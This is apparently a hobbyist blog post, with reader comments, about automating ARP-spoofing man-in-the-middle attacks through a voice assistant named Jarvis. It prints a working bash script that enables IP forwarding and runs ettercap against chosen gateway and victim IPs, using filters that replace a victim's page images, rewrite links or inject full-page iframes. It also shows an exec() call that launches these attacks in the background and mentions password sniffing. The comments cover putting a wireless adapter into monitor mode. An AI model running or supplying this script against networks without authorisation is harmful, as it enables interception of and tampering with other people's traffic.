Hacking Is So Easy, Even a Computer Can Do It
In The Avengers, there was a scene where Tony Stark had Jarvis hack into the Avengers mainframe.
I remember thinking, “how cool! I want to teach MY jarvis to do that!”.
Now, I don’t think any task is purely heuristic (except love, maybe?). Everything can be done systematically and/or algorithmically. It’s just a matter of discovering that system or algorithm. Even factoring large numbers (which, if discovered, will collapse the current state of online security).
So I decided to teach Jarvis to do a Man-In-The-Middle attack on any computer in the network. Man-in-the-Middle Attacks are easy to perform. With the right filters in place, you can do lots of cool things. I already created a bunch of different filters that do different things…. so it’s just a matter of automating that process.
First, I wrote a Bash script that runs different kinds of ettercap commands and filters and targets different IP’s.
#!/bin/bash
if [ $# -eq 0 ]
then
kill -9 `ps -eo comm,pid | awk '$1 == "ettercap" { print $2 }'`
else
sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
if [ $3 = mickey ]
then
ettercap -i eth1 -T -q -F mickeymouse.ef -M arp:remote /$1/ /$2/
elif [ $3 = link ]
then
ettercap -i eth1 -T -q -F hrefhack.ef -M arp:remote /$1/ /$2/
else
ettercap -i eth1 -T -q -F metasploit.ef -M arp:remote /$1/ /$2/
fi
fi
note: running your script as anybody other than su will have insufficient permissions. I leave it up to you to handle that
note 2: Those .ef files are my compiled filters. If you want to learn more about ettercap filters, search google or read this.
The .ef files shown here are just 3 of many compiled ettercap filters. The mickeymouse.ef replaces all images with my mickey mouse image. The hrefhack.ef filter replaces all href links with http://cranklin.com links. The metasploit.ef filter takes over the entire page with a giant iframe with the contents of http://cranklin.com.
Yes… harmless but fun.
Now, all I have to do is add another Jarvis conditional to attack a given IP address, and have her run:
exec('mitmscript [gateway IP] [victim IP] [attack type] > /dev/null 2>/dev/nul &');
Yup! That easy! Let’s watch her in action!
For the sake of brevity, I limited the video to demonstrations of 2 different types of attacks. In actuality, Jarvis is capable of doing many different types of attacks including logging, password sniffing, packet injections, etc etc.
Oh Jarvis. 🙂
cranklin.com 
Ettercap, Wireshark, Aircrack and other packet capturing software wont work on my Ubuntu Linux 12.04. It says I need a compatible interface in monitor mode. I tried using Airmon-ng but that only created an interface called mon0 that only worked with Ettercap. How would I configure lo,eth0, or wlan0 to monitor mode? I have an HP Pavilon g6 laptop.
Hey Michael, try using the mon0 interface when using ettercap, wireshark, etc.. that’s created when running airmon-ng. What kind of chipset is your wireless network adapter? If it’s a softnic card and doesn’t support monitor/inject, you may need to purchase a different wireless adapter.
This is what I’ve had to do with my Asus 1005hab (Atheros chipset) and now my Latitude E6420 (Broadcom, though don’t use the proprietary drivers in Ubuntu). Works like a charm when targeting mon0. To start mon0, use the command ‘sudo airmon-ng start wlan0’. mon0 will then be active. From the non use mon0 as the interface.
You could add a height paramter to the image tag, which would throw off websights natrual design and make your image the correct size 🙂 Realy the possibilitys or endless